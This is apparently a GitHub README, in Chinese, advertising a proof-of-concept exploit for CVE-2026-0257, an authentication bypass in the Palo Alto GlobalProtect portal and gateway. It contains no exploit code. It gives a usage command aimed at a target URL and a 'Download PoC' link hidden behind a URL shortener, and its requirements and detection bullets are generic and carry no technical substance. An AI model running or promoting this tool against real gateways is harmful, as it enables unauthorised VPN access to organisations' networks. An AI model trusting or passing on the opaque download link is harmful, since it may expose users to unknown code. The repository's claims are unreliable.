jennydokumi30/CVE-2026-0257

# CVE-2026-0257 - GlobalProtect 端口身份验证绕过 **严重性:** CRITICAL **CVSS:** 9.1 **影响:** 机密性，完整性 **发布日期:** 2026-05-13 ## 法律 仅限授权安全测试使用。 ## 根本原因（简版） Palo Alto Networks PAN-OS® 软件的 GlobalProtect 端口和网关中的身份验证绕过漏洞允许攻击者绕过安全限制并建立未经授权的 VPN 连接。 Panorama 和 Cloud NGFW 不受这些问题的影响。 ## 利用要求 - 可达的易受攻击目标 - 可预测的用户/工作流上下文 - 无额外加固阻止构造请求 ## 如何使用 ``` python3 exploit.py https://target.tld ``` ## 检测 - 监控可疑的身份验证流程偏差 - 调查与 CVE-2026-0257 相关的异常直接端点击中 ## 缓解措施 - 更新到修复后的供应商版本 - 限制风险端点并在可能的情况下强制执行多因素认证 ## 利用工具 [下载 PoC](https://tinyurl.com/287cjwar)

标签：威胁模拟, 逆向工具